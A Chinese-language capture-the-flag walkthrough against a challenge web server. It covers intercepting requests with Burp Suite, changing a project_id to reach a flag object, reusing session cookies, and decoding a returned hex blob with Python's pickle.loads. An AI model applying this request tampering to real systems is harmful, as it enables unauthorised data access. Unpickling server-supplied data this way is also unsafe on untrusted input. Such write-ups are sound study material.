Web 安全实战笔记:Burp Suite 技巧与应用
Step 1 登录网站
打开:
http://39.105.213.28:5000
注册:
用户名:admin
密码:123456

Step 2 抓 project/detail 包
访问任意功能。
Burp 会抓到:
POST /api/v1/project/detail

修改 body:
{"project_id":"flag-project-001"}
转发。
怎么拿真实 Cookie
回到 Burp:
Proxy → HTTP history
找到刚才成功登录后访问的请求,比如:
GET /dashboard
或者:
GET /api/admin/hint
点开它,看左下角 Request 里有没有:
Cookie: session=.eJy...
复制整行 Cookie,例如:
Cookie: session=.eJyVlNuO2jAQhl8FeW8J8jk2r7KpkGOPKRUkKIf2YsW7d8ZsWKC7VXtjmfnn7C...
然后粘到 Repeater,替换掉:
Cookie: session='session
Step 3 得到 trace_id
响应里会有:
{
"trace_id":"xxxx"
}
复制下来。

Step 4 提交 feedback
访问:
/feedback
提交:
"trace_id":"d4394fe0-1bcf-4e47-b6d0-c786c62ee00a"
页面会出现:
Object: 800495....
复制 hex。
这里的cookie是上一个请求返回的新的

"Object: 8004958c000000000000007d94288c0474797065948c0b464c41475f4f424a454354948c04666c6167948c1f495343437b657047466b3875756658654e37526b57776e617566757766727d948c0a70726f6a6563745f6964948c10666c61672d70726f6a6563742d303031948c0974696d657374616d70948c1a323032362d30352d31325430343a32363a32392e39393636313994752e",
Kali 中用 Python 解 pickle
终端:
python3
输入:
import pickle
hex_blob = "800495...."
obj = pickle.loads(bytes.fromhex(hex_blob))
print(obj)
print(obj.get("flag"))
即可得到 flag。
import pickle
hex_blob = "8004958c000000000000007d94288c0474797065948c0b464c41475f4f424a454354948c04666c6167948c1f495343437b657047466b3875756658654e37526b57776e617566757766727d948c0a70726f6a6563745f6964948c10666c61672d70726f6a6563742d303031948c0974696d657374616d70948c1a323032362d30352d31325430343a32363a32392e39393636313994752e"
obj = pickle.loads(bytes.fromhex(hex_blob))
print(obj)
print(obj.get("flag"))

浙公网安备 33010602011771号